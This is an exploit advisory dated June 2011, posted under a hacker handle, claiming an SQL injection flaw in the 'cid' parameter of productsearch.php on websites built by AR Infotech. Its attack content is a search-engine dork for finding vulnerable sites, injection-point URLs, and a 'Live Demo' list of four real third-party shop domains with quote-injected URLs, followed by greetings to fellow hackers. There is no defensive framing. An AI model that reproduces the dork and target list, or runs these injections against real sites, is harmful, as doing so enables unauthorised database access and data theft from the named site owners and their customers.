[----]
/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-
\-/ --------------------------------|-------------------------------------------------------|
\-/ [+] Exploit Title : AR Infotech SQL injection Vulnerability |
\-/ [+] Date : 07 June 2011 |
\-/ [+] Author : xConsoLe` |
\-/ [+] Category : WebApps |
\-/ [+] d0rk : "Website Developed By: AR Infotech." inurl:productsearch.php?cid= |
\-/ [+] Home : http://dzt00ls.tk/ Or http://dztools.net/ |
\-/ [+] Tested on : Windows Xp SP3 |
\-/ ------------------------|---------------------------------------------------------------|
/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-
( ) /\ _ (
\ | ( \ ( \.( ) _____
\ \ \ ` ` ) \ ( ___ / _ \
(_` \+ . x ( .\ \/ \____-----------/ (o) \_
- .- \+ ; ( O \____
Dz 4 ) \_____________ ` \ /
(__ Ever <3 +- .( -'.- <. - _ VVVVVVV VV V\ \/
(_____ ._._: <_ - <- _ (-- _AAAAAAA__A_/ |
. /./.+- . .- / +-- - . \______________//_ \_______
(__ ' /x / x _/ ( \___' \ /
, x / ( ' . / . / | \ /
/ / _/ / + / \/
' (__/ / \
[+]
[+] Vulnerable Code :
http://localhost/productsearch.php?cid=X
http://localhost/productsearch.php?cid=X'
http://localhost/productsearch.php?cid=[SQLi]
[+] Live Demo ;
[+] http://sumitgems.com/productsearch.php?cid=83'
[+] http://indianhandicraftsonline.net/productsearch.php?cid=1'
[+] http://www.beadpalaceinc.com/productsearch.php?cid=58'
[+] http://royalcanada.ca/productsearch.php?cid=1'
[+] Done ;D
[+] Greetz t0 ; My Friends ; Ukn0wnv1rus , Dfpirate , J|nX , alb0wz , XeN` ( GL <3 ) , mohsan123 , & All who i Forgot ;D .
[+] Proud To Be Algerian [Dz 4 Ever]
[+] Peace & Love ! .
[----]
